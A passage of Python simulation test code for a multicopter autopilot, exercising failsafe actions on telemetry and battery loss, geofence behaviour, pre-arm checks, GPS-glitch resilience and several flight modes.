self.wait_statustext("GCS Failsafe")
self.wait_disarmed()
self.end_subtest("GCS failsafe SmartRTL twice")
self.set_heartbeat_rate(self.speedup)
self.wait_statustext("GCS Failsafe Cleared", timeout=60)
self.context_pop()
# Trigger telemetry loss with failsafe disabled. Verify no action taken.
self.start_subtest("GCS failsafe disabled test: FS_GCS_ENABLE=0 should take no failsafe action")
self.setGCSfailsafe(0)
self.takeoffAndMoveAway()
self.set_heartbeat_rate(0)
self.delay_sim_time(5)
self.wait_mode("ALT_HOLD")
self.set_heartbeat_rate(self.speedup)
self.delay_sim_time(5)
self.wait_mode("ALT_HOLD")
self.end_subtest("Completed GCS failsafe disabled test")
# Trigger telemetry loss with failsafe enabled. Verify
# failsafe triggers to RTL. Restore telemetry, verify failsafe
# clears, and change modes.
self.start_subtest("GCS failsafe recovery test: FS_GCS_ENABLE=1 & FS_OPTIONS=0")
self.setGCSfailsafe(1)
self.set_parameter('FS_OPTIONS', 0)
self.set_heartbeat_rate(0)
self.wait_mode("RTL")
self.set_heartbeat_rate(self.speedup)
self.wait_statustext("GCS Failsafe Cleared", timeout=60)
self.change_mode("LOITER")
self.end_subtest("Completed GCS failsafe recovery test")
# Trigger telemetry loss with failsafe enabled. Verify failsafe triggers and RTL completes
self.start_subtest("GCS failsafe RTL with no options test: FS_GCS_ENABLE=1 & FS_OPTIONS=0")
self.setGCSfailsafe(1)
self.set_parameter('FS_OPTIONS', 0)
self.set_heartbeat_rate(0)
self.wait_mode("RTL")
self.wait_rtl_complete()
self.set_heartbeat_rate(self.speedup)
self.wait_statustext("GCS Failsafe Cleared", timeout=60)
self.end_subtest("Completed GCS failsafe RTL with no options test")
# Trigger telemetry loss with failsafe enabled. Verify failsafe triggers and land completes
self.start_subtest("GCS failsafe LAND with no options test: FS_GCS_ENABLE=5 & FS_OPTIONS=0")
self.setGCSfailsafe(5)
self.takeoffAndMoveAway()
self.set_heartbeat_rate(0)
self.wait_mode("LAND")
self.wait_landed_and_disarmed()
self.set_heartbeat_rate(self.speedup)
self.wait_statustext("GCS Failsafe Cleared", timeout=60)
self.end_subtest("Completed GCS failsafe land with no options test")
# Trigger telemetry loss with failsafe enabled. Verify failsafe triggers and SmartRTL completes
self.start_subtest("GCS failsafe SmartRTL->RTL with no options test: FS_GCS_ENABLE=3 & FS_OPTIONS=0")
self.setGCSfailsafe(3)
self.takeoffAndMoveAway()
self.set_heartbeat_rate(0)
self.wait_mode("SMART_RTL")
self.wait_disarmed()
self.set_heartbeat_rate(self.speedup)
self.wait_statustext("GCS Failsafe Cleared", timeout=60)
self.end_subtest("Completed GCS failsafe SmartRTL->RTL with no options test")
# Trigger telemetry loss with failsafe enabled. Verify failsafe triggers and SmartRTL completes
self.start_subtest("GCS failsafe SmartRTL->Land with no options test: FS_GCS_ENABLE=4 & FS_OPTIONS=0")
self.setGCSfailsafe(4)
self.takeoffAndMoveAway()
self.set_heartbeat_rate(0)
self.wait_mode("SMART_RTL")
self.wait_disarmed()
self.set_heartbeat_rate(self.speedup)
self.wait_statustext("GCS Failsafe Cleared", timeout=60)
self.end_subtest("Completed GCS failsafe SmartRTL->Land with no options test")
# Trigger telemetry loss with an invalid failsafe value. Verify failsafe triggers and RTL completes
self.start_subtest("GCS failsafe invalid value with no options test: FS_GCS_ENABLE=99 & FS_OPTIONS=0")
self.setGCSfailsafe(99)
self.takeoffAndMoveAway()
self.set_heartbeat_rate(0)
self.wait_mode("RTL")
self.wait_rtl_complete()
self.set_heartbeat_rate(self.speedup)
self.wait_statustext("GCS Failsafe Cleared", timeout=60)
self.end_subtest("Completed GCS failsafe invalid value with no options test")
# Trigger telemetry loss with failsafe enabled to test FS_OPTIONS settings
self.start_subtest("GCS failsafe with option bit tests: FS_GCS_ENABLE=1 & FS_OPTIONS=64/2/16")
num_wp = self.load_mission("copter_mission.txt", strict=False)
if not num_wp:
raise NotAchievedException("load copter_mission failed")
self.setGCSfailsafe(1)
self.set_parameter('FS_OPTIONS', 16)
self.takeoffAndMoveAway()
self.progress("Testing continue in pilot controlled modes")
self.set_heartbeat_rate(0)
self.wait_statustext("GCS Failsafe - Continuing Pilot Control", timeout=60)
self.delay_sim_time(5)
self.wait_mode("ALT_HOLD")
self.set_heartbeat_rate(self.speedup)
self.wait_statustext("GCS Failsafe Cleared", timeout=60)
self.progress("Testing continue in auto mission")
self.set_parameter('FS_OPTIONS', 2)
self.change_mode("AUTO")
self.delay_sim_time(5)
self.set_heartbeat_rate(0)
self.wait_statustext("GCS Failsafe - Continuing Auto Mode", timeout=60)
self.delay_sim_time(5)
self.wait_mode("AUTO")
self.set_heartbeat_rate(self.speedup)
self.wait_statustext("GCS Failsafe Cleared", timeout=60)
self.progress("Testing continue landing in land mode")
self.set_parameter('FS_OPTIONS', 8)
self.change_mode("LAND")
self.delay_sim_time(5)
self.set_heartbeat_rate(0)
self.wait_statustext("GCS Failsafe - Continuing Landing", timeout=60)
self.delay_sim_time(5)
self.wait_mode("LAND")
self.wait_landed_and_disarmed()
self.set_heartbeat_rate(self.speedup)
self.wait_statustext("GCS Failsafe Cleared", timeout=60)
self.end_subtest("Completed GCS failsafe with option bits")
self.setGCSfailsafe(0)
self.set_parameter('FS_OPTIONS', 0)
self.progress("All GCS failsafe tests complete")
self.reboot_sitl()
# Tests all actions and logic behind the battery failsafe
def fly_battery_failsafe(self, timeout=300):
ex = None
try:
self.test_battery_failsafe(timeout=timeout)
except Exception as e:
self.print_exception_caught(e)
ex = e
self.set_parameter('BATT_LOW_VOLT', 0)
self.set_parameter('BATT_CRT_VOLT', 0)
self.set_parameter('BATT_FS_LOW_ACT', 0)
self.set_parameter('BATT_FS_CRT_ACT', 0)
self.set_parameter('FS_OPTIONS', 0)
self.reboot_sitl()
if ex is not None:
raise ex
def test_battery_failsafe(self, timeout=300):
self.progress("Configure battery failsafe parameters")
self.set_parameters({
'SIM_SPEEDUP': 4,
'BATT_LOW_VOLT': 11.5,
'BATT_CRT_VOLT': 10.1,
'BATT_FS_LOW_ACT': 0,
'BATT_FS_CRT_ACT': 0,
'FS_OPTIONS': 0,
'SIM_BATT_VOLTAGE': 12.5,
})
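# with both failsafe actions set to 0 (disabled) the vehicle should
# report low/critical battery but take no action; the trigger
# voltages straddle the simulated 12.5V battery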
# Trigger low battery condition with failsafe disabled. Verify
# no action taken.
self.start_subtest("Batt failsafe disabled test")
self.takeoffAndMoveAway()
self.set_parameter('SIM_BATT_VOLTAGE', 11.4)
self.wait_statustext("Battery 1 is low", timeout=60)
self.delay_sim_time(5)
self.wait_mode("ALT_HOLD")
self.set_parameter('SIM_BATT_VOLTAGE', 10.0)
self.wait_statustext("Battery 1 is critical", timeout=60)
self.delay_sim_time(5)
self.wait_mode("ALT_HOLD")
self.change_mode("RTL")
self.wait_rtl_complete()
self.set_parameter('SIM_BATT_VOLTAGE', 12.5)
self.reboot_sitl()
self.end_subtest("Completed Batt failsafe disabled test")
# TWO STAGE BATTERY FAILSAFE: Trigger low battery condition,
# then critical battery condition. Verify RTL and Land actions
# complete.
self.start_subtest("Two stage battery failsafe test with RTL and Land")
self.takeoffAndMoveAway()
self.delay_sim_time(3)
self.set_parameter('BATT_FS_LOW_ACT', 2)
self.set_parameter('BATT_FS_CRT_ACT', 1)
self.set_parameter('SIM_BATT_VOLTAGE', 11.4)
self.wait_statustext("Battery 1 is low", timeout=60)
self.delay_sim_time(5)
self.wait_mode("RTL")
self.delay_sim_time(10)
self.set_parameter('SIM_BATT_VOLTAGE', 10.0)
self.wait_statustext("Battery 1 is critical", timeout=60)
self.delay_sim_time(5)
self.wait_mode("LAND")
self.wait_landed_and_disarmed()
self.set_parameter('SIM_BATT_VOLTAGE', 12.5)
self.reboot_sitl()
self.end_subtest("Completed two stage battery failsafe test with RTL and Land")
# TWO STAGE BATTERY FAILSAFE: Trigger low battery condition,
# then critical battery condition. Verify both SmartRTL
# actions complete
self.start_subtest("Two stage battery failsafe test with SmartRTL")
self.takeoffAndMoveAway()
self.set_parameter('BATT_FS_LOW_ACT', 3)
self.set_parameter('BATT_FS_CRT_ACT', 4)
self.delay_sim_time(10)
self.set_parameter('SIM_BATT_VOLTAGE', 11.4)
self.wait_statustext("Battery 1 is low", timeout=60)
self.delay_sim_time(5)
self.wait_mode("SMART_RTL")
self.change_mode("LOITER")
self.delay_sim_time(10)
self.set_parameter('SIM_BATT_VOLTAGE', 10.0)
self.wait_statustext("Battery 1 is critical", timeout=60)
self.delay_sim_time(5)
self.wait_mode("SMART_RTL")
self.wait_disarmed()
self.set_parameter('SIM_BATT_VOLTAGE', 12.5)
self.reboot_sitl()
self.end_subtest("Completed two stage battery failsafe test with SmartRTL")
# Trigger low battery condition in land mode with FS_OPTIONS
# set to allow land mode to continue. Verify landing completes
# uninterrupted.
self.start_subtest("Battery failsafe with FS_OPTIONS set to continue landing")
self.takeoffAndMoveAway()
self.set_parameter('FS_OPTIONS', 8)
self.change_mode("LAND")
self.delay_sim_time(5)
self.set_parameter('SIM_BATT_VOLTAGE', 11.4)
self.wait_statustext("Battery 1 is low", timeout=60)
self.delay_sim_time(5)
self.wait_mode("LAND")
self.wait_landed_and_disarmed()
self.set_parameter('SIM_BATT_VOLTAGE', 12.5)
self.reboot_sitl()
self.end_subtest("Completed battery failsafe with FS_OPTIONS set to continue landing")
# Trigger a critical battery condition, which triggers a land
# mode failsafe. Trigger an RC failure. Verify the RC failsafe
# is prevented from stopping the low battery landing.
self.start_subtest("Battery failsafe critical landing")
self.takeoffAndMoveAway(100, 50)
self.set_parameter('FS_OPTIONS', 0)
self.set_parameter('BATT_FS_LOW_ACT', 1)
self.set_parameter('BATT_FS_CRT_ACT', 1)
self.set_parameter('FS_THR_ENABLE', 1)
self.delay_sim_time(5)
self.set_parameter('SIM_BATT_VOLTAGE', 10.0)
self.wait_statustext("Battery 1 is critical", timeout=60)
self.wait_mode("LAND")
self.delay_sim_time(10)
self.set_parameter("SIM_RC_FAIL", 1)
self.delay_sim_time(10)
self.wait_mode("LAND")
self.wait_landed_and_disarmed()
self.set_parameter('SIM_BATT_VOLTAGE', 12.5)
self.set_parameter("SIM_RC_FAIL", 0)
self.reboot_sitl()
self.end_subtest("Completed battery failsafe critical landing")
# Trigger low battery condition with failsafe set to terminate. Copter will disarm and crash.
self.start_subtest("Battery failsafe terminate")
self.takeoffAndMoveAway()
self.set_parameter('BATT_FS_LOW_ACT', 5)
self.delay_sim_time(10)
self.set_parameter('SIM_BATT_VOLTAGE', 11.4)
self.wait_statustext("Battery 1 is low", timeout=60)
self.wait_disarmed()
self.end_subtest("Completed terminate failsafe test")
self.progress("All Battery failsafe tests complete")
# fly_stability_patch - fly south, then hold loiter within 5m
# position and altitude and reduce 1 motor to 60% efficiency
def fly_stability_patch(self,
holdtime=30,
maxaltchange=5,
maxdistchange=10):
self.takeoff(10, mode="LOITER")
# first south
self.progress("turn south")
self.set_rc(4, 1580)
self.wait_heading(180)
self.set_rc(4, 1500)
# fly forward (south, the direction we just turned to face) 80m
self.set_rc(2, 1100)
self.wait_distance(80)
self.set_rc(2, 1500)
# wait for copter to slow down
self.wait_groundspeed(0, 2)
m = self.mav.recv_match(type='VFR_HUD', blocking=True)
start_altitude = m.alt
start = self.mav.location()
tstart = self.get_sim_time()
self.progress("Holding loiter at %u meters for %u seconds" %
(start_altitude, holdtime))
# cut motor 1 to 65% efficiency
self.progress("Cutting motor 1 to 65% efficiency")
self.set_parameter("SIM_ENGINE_MUL", 0.65)
while self.get_sim_time_cached() < tstart + holdtime:
m = self.mav.recv_match(type='VFR_HUD', blocking=True)
pos = self.mav.location()
delta = self.get_distance(start, pos)
alt_delta = math.fabs(m.alt - start_altitude)
self.progress("Loiter Dist: %.2fm, alt:%u" % (delta, m.alt))
if alt_delta > maxaltchange:
raise NotAchievedException(
"Loiter alt shifted %u meters (> limit %u)" %
(alt_delta, maxaltchange))
if delta > maxdistchange:
raise NotAchievedException(
("Loiter shifted %u meters (> limit of %u)" %
(delta, maxdistchange)))
# restore motor 1 to 100% efficiency
self.set_parameter("SIM_ENGINE_MUL", 1.0)
self.progress("Stability patch and Loiter OK for %us" % holdtime)
self.progress("RTL after stab patch")
self.do_RTL()
def debug_arming_issue(self):
while True:
self.send_mavlink_arm_command()
m = self.mav.recv_match(blocking=True, timeout=1)
if m is None:
continue
if m.get_type() in ["STATUSTEXT", "COMMAND_ACK"]:
print("Got: %s" % str(m))
if self.mav.motors_armed():
self.progress("Armed")
return
# fly_fence_avoid_test - fly towards the circular fence with avoidance enabled and check we are held at the fence margin
avoid_behave_slide = 0
def fly_fence_avoid_test_radius_check(self, timeout=180, avoid_behave=avoid_behave_slide):
using_mode = "LOITER" # must be something which adjusts velocity!
self.change_mode(using_mode)
self.set_parameter("FENCE_ENABLE", 1) # fence
self.set_parameter("FENCE_TYPE", 2) # circle
fence_radius = 15
self.set_parameter("FENCE_RADIUS", fence_radius)
fence_margin = 3
self.set_parameter("FENCE_MARGIN", fence_margin)
self.set_parameter("AVOID_ENABLE", 1)
self.set_parameter("AVOID_BEHAVE", avoid_behave)
self.set_parameter("RC10_OPTION", 40) # avoid-enable
self.wait_ready_to_arm()
self.set_rc(10, 2000)
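# RC10 high enables avoidance via the aux function configured above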
home_distance = self.distance_to_home(use_cached_home=True)
if home_distance > 5:
raise PreconditionFailedException("Expected to be within 5m of home")
self.zero_throttle()
self.arm_vehicle()
self.set_rc(3, 1700)
self.wait_altitude(10, 100, relative=True)
self.set_rc(3, 1500)
self.set_rc(2, 1400)
self.wait_distance_to_home(12, 20)
tstart = self.get_sim_time()
push_time = 70 # push against barrier for 70 seconds
failed_max = False
failed_min = False
while True:
if self.get_sim_time() - tstart > push_time:
self.progress("Push time up")
break
# make sure we don't RTL:
if not self.mode_is(using_mode):
raise NotAchievedException("Changed mode away from %s" % using_mode)
distance = self.distance_to_home(use_cached_home=True)
inner_radius = fence_radius - fence_margin
want_min = inner_radius - 1 # allow 1m either way
want_max = inner_radius + 1 # allow 1m either way
self.progress("Push: distance=%f %f<want<%f" %
(distance, want_min, want_max))
if distance < want_min:
if failed_min is False:
self.progress("Failed min")
failed_min = True
if distance > want_max:
if failed_max is False:
self.progress("Failed max")
failed_max = True
if failed_min and failed_max:
raise NotAchievedException("Failed both min and max checks. Clever")
if failed_min:
raise NotAchievedException("Failed min")
if failed_max:
raise NotAchievedException("Failed max")
self.set_rc(2, 1500)
self.do_RTL()
def fly_fence_avoid_test(self, timeout=180):
self.fly_fence_avoid_test_radius_check(avoid_behave=1, timeout=timeout)
self.fly_fence_avoid_test_radius_check(avoid_behave=0, timeout=timeout)
def assert_prearm_failure(self, expected_statustext, timeout=5, ignore_prearm_failures=[]):
seen_statustext = False
seen_command_ack = False
self.drain_mav()
tstart = self.get_sim_time_cached()
arm_last_send = 0
while True:
if seen_command_ack and seen_statustext:
break
now = self.get_sim_time_cached()
if now - tstart > timeout:
raise NotAchievedException(
"Did not see failure-to-arm messages (statustext=%s command_ack=%s" %
(seen_statustext, seen_command_ack))
if now - arm_last_send > 1:
arm_last_send = now
self.send_mavlink_arm_command()
m = self.mav.recv_match(blocking=True, timeout=1)
if m is None:
continue
if m.get_type() == "STATUSTEXT":
if expected_statustext in m.text:
self.progress("Got: %s" % str(m))
seen_statustext = True
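# strip the leading "PreArm: " (8 characters) before
# consulting the ignore list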
elif "PreArm" in m.text and m.text[8:] not in ignore_prearm_failures:
self.progress("Got: %s" % str(m))
raise NotAchievedException("Unexpected prearm failure (%s)" % m.text)
if m.get_type() == "COMMAND_ACK":
print("Got: %s" % str(m))
if m.command == mavutil.mavlink.MAV_CMD_COMPONENT_ARM_DISARM:
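# a result of 4 is MAV_RESULT_FAILED, i.e. the arm was refused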
if m.result != 4:
raise NotAchievedException("command-ack says we didn't fail to arm")
self.progress("Got: %s" % str(m))
seen_command_ack = True
if self.mav.motors_armed():
raise NotAchievedException("Armed when we shouldn't have")
# fly_fence_test - fly east until you hit the horizontal circular fence
def fly_fence_test(self, timeout=180):
# enable fence, disable avoidance
self.set_parameter("FENCE_ENABLE", 1)
self.set_parameter("AVOID_ENABLE", 0)
self.change_mode("LOITER")
self.wait_ready_to_arm()
# fence requires home to be set:
m = self.poll_home_position()
if m is None:
raise NotAchievedException("Did not receive HOME_POSITION")
self.progress("home: %s" % str(m))
self.start_subtest("ensure we can't arm if outside fence")
self.load_fence("fence-in-middle-of-nowhere.txt")
self.delay_sim_time(5) # let fence check run so it loads-from-eeprom
self.assert_prearm_failure("vehicle outside fence")
self.progress("Failed to arm outside fence (good!)")
self.clear_fence()
self.delay_sim_time(5) # let fence breach clear
self.drain_mav()
self.end_subtest("ensure we can't arm if outside fence")
self.start_subtest("ensure we can't arm with bad radius")
self.context_push()
self.set_parameter("FENCE_RADIUS", -1)
self.assert_prearm_failure("Invalid FENCE_RADIUS value")
self.context_pop()
self.progress("Failed to arm with bad radius")
self.drain_mav()
self.end_subtest("ensure we can't arm with bad radius")
self.start_subtest("ensure we can't arm with bad alt")
self.context_push()
self.set_parameter("FENCE_ALT_MAX", -1)
self.assert_prearm_failure("Invalid FENCE_ALT_MAX value")
self.context_pop()
self.progress("Failed to arm with bad altitude")
self.end_subtest("ensure we can't arm with bad radius")
self.start_subtest("Check breach-fence behaviour")
self.set_parameter("FENCE_TYPE", 2)
self.takeoff(10, mode="LOITER")
# first east
self.progress("turn east")
self.set_rc(4, 1580)
self.wait_heading(160, timeout=60)
self.set_rc(4, 1500)
fence_radius = self.get_parameter("FENCE_RADIUS")
self.progress("flying forward (east) until we hit fence")
pitching_forward = True
self.set_rc(2, 1100)
self.progress("Waiting for fence breach")
tstart = self.get_sim_time()
while not self.mode_is("RTL"):
if self.get_sim_time_cached() - tstart > 30:
raise NotAchievedException("Did not breach fence")
m = self.mav.recv_match(type='GLOBAL_POSITION_INT', blocking=True)
alt = m.relative_alt / 1000.0 # mm -> m
home_distance = self.distance_to_home(use_cached_home=True)
self.progress("Alt: %.02f HomeDistance: %.02f (fence radius=%f)" %
(alt, home_distance, fence_radius))
self.progress("Waiting until we get home and disarm")
tstart = self.get_sim_time()
while self.get_sim_time_cached() < tstart + timeout:
m = self.mav.recv_match(type='GLOBAL_POSITION_INT', blocking=True)
alt = m.relative_alt / 1000.0 # mm -> m
home_distance = self.distance_to_home(use_cached_home=True)
self.progress("Alt: %.02f HomeDistance: %.02f" %
(alt, home_distance))
# recenter pitch sticks once we're home so we don't fly off again
if pitching_forward and home_distance < 50:
pitching_forward = False
self.set_rc(2, 1475)
# disable fence
self.set_parameter("FENCE_ENABLE", 0)
if (alt <= 1 and home_distance < 10) or (not self.armed() and home_distance < 10):
# reduce throttle
self.zero_throttle()
self.change_mode("LAND")
self.wait_landed_and_disarmed()
self.progress("Reached home OK")
self.zero_throttle()
return
# given we're testing RTL, doing one here probably doesn't make sense
home_distance = self.distance_to_home(use_cached_home=True)
raise AutoTestTimeoutException(
"Fence test failed to reach home (%fm distance) - "
"timed out after %u seconds" % (home_distance, timeout,))
# fly_alt_max_fence_test - fly up until you hit the fence ceiling
def fly_alt_max_fence_test(self):
self.takeoff(10, mode="LOITER")
"""Hold loiter position."""
# enable fence, disable avoidance
self.set_parameter("FENCE_ENABLE", 1)
self.set_parameter("AVOID_ENABLE", 0)
self.set_parameter("FENCE_TYPE", 1)
self.change_alt(10)
# first east
self.progress("turning east")
self.set_rc(4, 1580)
self.wait_heading(160, timeout=60)
self.set_rc(4, 1500)
self.progress("flying east 20m")
self.set_rc(2, 1100)
self.wait_distance(20)
self.progress("flying up")
self.set_rc_from_map({
2: 1500,
3: 1800,
})
# wait for fence to trigger
self.wait_mode('RTL', timeout=120)
self.wait_rtl_complete()
self.zero_throttle()
# fly_alt_min_fence_test - fly down until you hit the fence floor
def fly_alt_min_fence_test(self):
self.takeoff(30, mode="LOITER", timeout=60)
# enable fence, disable avoidance
self.set_parameter("AVOID_ENABLE", 0)
self.set_parameter("FENCE_TYPE", 8)
self.set_parameter("FENCE_ALT_MIN", 20)
self.change_alt(30)
# Activate the floor fence
# TODO this test should run without requiring this
self.do_fence_enable()
# first east
self.progress("turn east")
self.set_rc(4, 1580)
self.wait_heading(160, timeout=60)
self.set_rc(4, 1500)
# fly forward (east) at least 20m
self.set_rc(2, 1100)
self.wait_distance(20)
# stop flying forward and start flying down:
self.set_rc_from_map({
2: 1500,
3: 1200,
})
# wait for fence to trigger
self.wait_mode('RTL', timeout=120)
self.wait_rtl_complete()
# Disable the fence using mavlink command to ensure cleaned up SITL state
self.do_fence_disable()
self.zero_throttle()
def fly_fence_floor_enabled_landing(self):
""" fly_fence_floor_enabled_landing. Ensures we can initiate and complete
an RTL while the fence is enabled. """
fence_bit = mavutil.mavlink.MAV_SYS_STATUS_GEOFENCE
self.progress("Test Landing while fence floor enabled")
self.set_parameter("AVOID_ENABLE", 0)
self.set_parameter("FENCE_TYPE", 15)
self.set_parameter("FENCE_ALT_MIN", 10)
self.set_parameter("FENCE_ALT_MAX", 20)
self.change_mode("GUIDED")
self.wait_ready_to_arm()
self.arm_vehicle()
self.user_takeoff(alt_min=15)
# Check fence is enabled
self.do_fence_enable()
self.assert_fence_enabled()
# Change to RC controlled mode
self.change_mode('LOITER')
self.set_rc(3, 1800)
self.wait_mode('RTL', timeout=120)
self.wait_landed_and_disarmed()
self.assert_fence_enabled()
# Assert fence is not healthy
self.assert_sensor_state(fence_bit, healthy=False)
# Disable the fence using mavlink command to ensure cleaned up SITL state
self.do_fence_disable()
self.assert_fence_disabled()
def fly_gps_glitch_loiter_test(self, timeout=30, max_distance=20):
"""fly_gps_glitch_loiter_test. Fly south east in loiter and test
reaction to gps glitch."""
self.takeoff(10, mode="LOITER")
# turn on simulator display of gps and actual position
if self.use_map:
self.show_gps_and_sim_positions(True)
# set-up gps glitch array
glitch_lat = [0.0002996,
0.0006958,
0.0009431,
0.0009991,
0.0009444,
0.0007716,
0.0006221]
glitch_lon = [0.0000717,
0.0000912,
0.0002761,
0.0002626,
0.0002807,
0.0002049,
0.0001304]
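# glitch offsets are in degrees of latitude/longitude; 0.0001 deg
# is roughly 11m, so these glitches are on the order of tens of meters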
glitch_num = len(glitch_lat)
self.progress("GPS Glitches:")
for i in range(glitch_num):
self.progress("glitch %d %.7f %.7f" %
(i, glitch_lat[i], glitch_lon[i]))
# turn south east
self.progress("turn south east")
self.set_rc(4, 1580)
try:
self.wait_heading(150)
self.set_rc(4, 1500)
# fly forward (south east) at least 60m
self.set_rc(2, 1100)
self.wait_distance(60)
self.set_rc(2, 1500)
# wait for copter to slow down
except Exception as e:
if self.use_map:
self.show_gps_and_sim_positions(False)
raise e
# record time and position
tstart = self.get_sim_time()
tnow = tstart
start_pos = self.sim_location()
# initialise current glitch
glitch_current = 0
self.progress("Apply first glitch")
self.set_parameter("SIM_GPS_GLITCH_X", glitch_lat[glitch_current])
self.set_parameter("SIM_GPS_GLITCH_Y", glitch_lon[glitch_current])
# record position for 30 seconds
while tnow < tstart + timeout:
tnow = self.get_sim_time_cached()
desired_glitch_num = int((tnow - tstart) * 2.2)
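# step to a new glitch roughly every 0.45 seconds
# (2.2 glitches per second of sim time)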
if desired_glitch_num > glitch_current and glitch_current != -1:
glitch_current = desired_glitch_num
# turn off glitching if we've reached the end of glitch list
if glitch_current >= glitch_num:
glitch_current = -1
self.progress("Completed Glitches")
self.set_parameter("SIM_GPS_GLITCH_X", 0)
self.set_parameter("SIM_GPS_GLITCH_Y", 0)
else:
self.progress("Applying glitch %u" % glitch_current)
# move onto the next glitch
self.set_parameter("SIM_GPS_GLITCH_X", glitch_lat[glitch_current])
self.set_parameter("SIM_GPS_GLITCH_Y", glitch_lon[glitch_current])
# start displaying distance moved after all glitches applied
if glitch_current == -1:
m = self.mav.recv_match(type='GLOBAL_POSITION_INT',
blocking=True)
alt = m.alt/1000.0 # mm -> m
curr_pos = self.sim_location()
moved_distance = self.get_distance(curr_pos, start_pos)
self.progress("Alt: %.02f Moved: %.0f" %
(alt, moved_distance))
if moved_distance > max_distance:
raise NotAchievedException(
"Moved over %u meters, Failed!" % max_distance)
else:
self.drain_mav()
# disable gps glitch
if glitch_current != -1:
self.set_parameter("SIM_GPS_GLITCH_X", 0)
self.set_parameter("SIM_GPS_GLITCH_Y", 0)
if self.use_map:
self.show_gps_and_sim_positions(False)
self.progress("GPS glitch test passed!"
" stayed within %u meters for %u seconds" %
(max_distance, timeout))
self.do_RTL()
# re-arming is problematic because the GPS is glitching!
self.reboot_sitl()
# fly_gps_glitch_auto_test - fly mission and test reaction to gps glitch
def fly_gps_glitch_auto_test(self, timeout=180):
# set-up gps glitch array
glitch_lat = [0.0002996,
0.0006958,
0.0009431,
0.0009991,
0.0009444,
0.0007716,
0.0006221]
glitch_lon = [0.0000717,
0.0000912,
0.0002761,
0.0002626,
0.0002807,
0.0002049,
0.0001304]
glitch_num = len(glitch_lat)
self.progress("GPS Glitches:")
for i in range(glitch_num):
self.progress("glitch %d %.7f %.7f" %
(i, glitch_lat[i], glitch_lon[i]))
# Fly mission #1
self.progress("# Load copter_glitch_mission")
# load the waypoint count
num_wp = self.load_mission("copter_glitch_mission.txt", strict=False)
if not num_wp:
raise NotAchievedException("load copter_glitch_mission failed")
# turn on simulator display of gps and actual position
if self.use_map:
self.show_gps_and_sim_positions(True)
self.progress("test: Fly a mission from 1 to %u" % num_wp)
self.set_current_waypoint(1)
self.change_mode("STABILIZE")
self.wait_ready_to_arm()
self.zero_throttle()
self.arm_vehicle()
# switch into AUTO mode and raise throttle
self.change_mode('AUTO')
self.set_rc(3, 1500)
# wait until 100m from home
try:
self.wait_distance(100, 5, 90)
except Exception as e:
if self.use_map:
self.show_gps_and_sim_positions(False)
raise e
# record time and position
tstart = self.get_sim_time()
# initialise current glitch
glitch_current = 0
self.progress("Apply first glitch")
self.set_parameter("SIM_GPS_GLITCH_X", glitch_lat[glitch_current])
self.set_parameter("SIM_GPS_GLITCH_Y", glitch_lon[glitch_current])
# step through the glitch list until it is exhausted
while glitch_current < glitch_num:
tnow = self.get_sim_time()
desired_glitch_num = int((tnow - tstart) * 2.2)
if desired_glitch_num > glitch_current and glitch_current != -1:
glitch_current = desired_glitch_num
# apply next glitch
if glitch_current < glitch_num:
self.progress("Applying glitch %u" % glitch_current)
self.set_parameter("SIM_GPS_GLITCH_X",
glitch_lat[glitch_current])
self.set_parameter("SIM_GPS_GLITCH_Y",
glitch_lon[glitch_current])
# turn off glitching
self.progress("Completed Glitches")
self.set_parameter("SIM_GPS_GLITCH_X", 0)
self.set_parameter("SIM_GPS_GLITCH_Y", 0)
# continue with the mission
self.wait_waypoint(0, num_wp-1, timeout=500)
# wait for arrival back home
self.wait_distance_to_home(0, 10, timeout=timeout)
# turn off simulator display of gps and actual position
if self.use_map:
self.show_gps_and_sim_positions(False)
self.progress("GPS Glitch test Auto completed: passed!")
self.wait_disarmed()
# re-arming is problematic because the GPS is glitching!
self.reboot_sitl()
# fly_simple - assumes the simple bearing is initialised to be
# directly north; flies a box: south `side` meters, west for 8
# seconds, north `side/2` meters, east for 8 seconds
def fly_simple(self, side=50):
self.takeoff(10, mode="LOITER")
# set SIMPLE mode for all flight modes
self.set_parameter("SIMPLE", 63)
# switch to stabilize mode
self.change_mode('STABILIZE')
self.set_rc(3, 1545)
# fly south 50m
self.progress("# Flying south %u meters" % side)
self.set_rc(1, 1300)
self.wait_distance(side, 5, 60)
self.set_rc(1, 1500)
# fly west 8 seconds
self.progress("# Flying west for 8 seconds")
self.set_rc(2, 1300)
tstart = self.get_sim_time()
while self.get_sim_time_cached() < (tstart + 8):
self.mav.recv_match(type='VFR_HUD', blocking=True)
self.set_rc(2, 1500)
# fly north 25 meters
self.progress("# Flying north %u meters" % (side/2.0))
self.set_rc(1, 1700)
self.wait_distance(side/2, 5, 60)
self.set_rc(1, 1500)
# fly east 8 seconds
self.progress("# Flying east for 8 seconds")
self.set_rc(2, 1700)
tstart = self.get_sim_time()
while self.get_sim_time_cached() < (tstart + 8):
self.mav.recv_match(type='VFR_HUD', blocking=True)
self.set_rc(2, 1500)
# hover in place
self.hover()
self.do_RTL(timeout=500)
# fly_super_simple - flies a circle around home for 45 seconds
def fly_super_simple(self, timeout=45):
self.takeoff(10, mode="LOITER")
# fly forward 20m
self.progress("# Flying forward 20 meters")
self.set_rc(2, 1300)
self.wait_distance(20, 5, 60)
self.set_rc(2, 1500)
# set SUPER SIMPLE mode for all flight modes
self.set_parameter("SUPER_SIMPLE", 63)
# switch to stabilize mode
self.change_mode("ALT_HOLD")
self.set_rc(3, 1500)
# start copter yawing slowly
self.set_rc(4, 1550)
# roll left for timeout seconds
self.progress("# rolling left from pilot's POV for %u seconds"
% timeout)
self.set_rc(1, 1300)
tstart = self.get_sim_time()
while self.get_sim_time_cached() < (tstart + timeout):
self.mav.recv_match(type='VFR_HUD', blocking=True)
# stop rolling and yawing
self.set_rc(1, 1500)
self.set_rc(4, 1500)
# restore simple mode parameters to default
self.set_parameter("SUPER_SIMPLE", 0)
# hover in place
self.hover()
self.do_RTL()
# fly_circle - flies a circle with 30m radius
def fly_circle(self, holdtime=36):
# the following should not be required. But there appears to
# be a physics failure in the simulation which is causing CI
# to fall over a lot. -pb 202007021209
self.reboot_sitl()
self.takeoff(10, mode="LOITER")
# face west
self.progress("turn west")
self.set_rc(4, 1580)
self.wait_heading(270)
self.set_rc(4, 1500)
# set CIRCLE radius (centimeters; 3000 == 30m)
self.set_parameter("CIRCLE_RADIUS", 3000)
# fly forward (west, the direction we just turned to face) at least 100m
self.set_rc(2, 1100)
self.wait_distance(100)
# return pitch stick back to middle
self.set_rc(2, 1500)
# set CIRCLE mode
self.change_mode('CIRCLE')
# wait
m = self.mav.recv_match(type='VFR_HUD', blocking=True)
start_altitude = m.alt
